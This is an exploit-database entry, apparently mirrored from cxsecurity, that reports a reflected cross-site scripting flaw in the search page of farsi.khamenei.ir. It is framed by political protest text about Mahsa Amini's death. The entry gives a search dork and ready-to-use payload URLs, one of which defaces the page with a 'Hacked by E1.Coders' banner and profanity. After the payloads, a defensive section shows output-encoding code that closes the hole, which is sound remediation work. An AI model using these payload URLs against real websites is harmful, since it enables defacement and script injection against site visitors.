Khameneie.ir XSS vulnerabilities

CVE: N/A
Category: CWE-79
Price: N/A
Severity: Critical
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2022-10-23
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022100062

Below is a copy:

Khameneie.ir XSS vulnerabilities
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
confidential "Top Secret" 
This message is written to describe the security issue and is confidential and should not be included in the report


This site belongs to the organization of the leader of the Islamic Republic of Iran, "Khamenei", who ordered the killing of Mehsa Amini, a 22-year-old Iranian woman. She was killed by the moral police, the people protested in the streets, and now the Iranian police are trying to identify these people.
This site has a security issue with an XSS vulnerability.
We have reported many times to this site that it has a security problem and it has ignored our report.
We want to definitely register and report this security issue.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*


####################################################################################
#
# Exploit Title : Khameneie.ir has XSS vulnerabilities
# Author        : E1.Coders
# Contact       : E1.Coders [at] Mail [dot] RU
# Portal Link   : khamenei.ir (https://farsi.khamenei.ir)
# Tested ON     : All language version Host
# Security Risk : ~[Critical]~
# Description   : All websites with this version used can be targeted
# DorK          : "intext:"site:farsi.khamenei.ir/search-result?q="
#                 site:farsi.khamenei.ir/search-result?q=YOUR KEYWORD&
#
####################################################################################




Details :


The vulnerable file is "book-archive".



XSS Expl0iTs :


https://farsi.khamenei.ir/search-result?q=%3CXSS%20SCRIPT%3E&nt=99,101,2,4,9,1,16,

Dem0 :

https://farsi.khamenei.ir/search-result?q=%3C/script%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ccenter%3E%3Ch1%3EHacked%20by%20E1.Coders%3C/h1%3E%3Cimg%20src=%27https://cybercrimemag.wpenginepowered.com/wp-content/uploads/2018/11/Keyboard-Typing-700x467.jpg%27%3E%3Ccenter%3E%3Ch2%3ERUSSIAN%20-%20BLACK%20-%HAT%20%3C/h2%3E%3C/center%3E%3Ch2%3ESECURITY_is_Low%20~Fuck~%3C/h2%3E%3C/center%3E%22%3C/script%3E&nt=99,101,2,4,9,1,16
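
The demo value above begins by closing a script element, which suggests the `q` parameter is reflected inside an inline script block; that placement is an assumption, since the page does not show the server-side template. The following is an added example, not code from the advisory or from the site, and every function name in it is hypothetical. It shows the output encoding a search handler needs for the two contexts a reflected search term usually lands in: HTML text and an inline script literal.

```javascript
// Added example: context-aware output encoding for a reflected search term.
// All names are hypothetical; the site's real template is not shown on the page.

// Encode for HTML text and quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Encode for an inline <script> block: JSON.stringify handles quotes and
// backslashes, then <, >, & and the JS line separators become \uXXXX escapes
// so the HTML parser never sees a closing script tag inside the literal.
function toScriptLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&\u2028\u2029]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

// Vulnerable pattern: raw query value concatenated into both contexts.
function renderUnsafe(q) {
  return `<h1>Results for ${q}</h1><script>var term = "${q}";</script>`;
}

// Hardened pattern: each sink gets the encoder for its own context.
function renderSafe(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>` +
         `<script>var term = ${toScriptLiteral(q)};</script>`;
}

// Constructed sample input with the same shape as the demo value
// (script close followed by a new script element) and a harmless body.
const sample = '</script><script>document.title="test"</script>';

// Count the script elements an HTML parser would open in the output.
function countScriptOpens(html) {
  return (html.match(/<script\b/gi) || []).length;
}

console.log(countScriptOpens(renderUnsafe(sample))); // 3: two injected, one intended
console.log(countScriptOpens(renderSafe(sample)));   // 1: only the intended block
```

A Content-Security-Policy that disallows inline script is a useful second layer, but the encoding at each sink is what removes the injection point.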
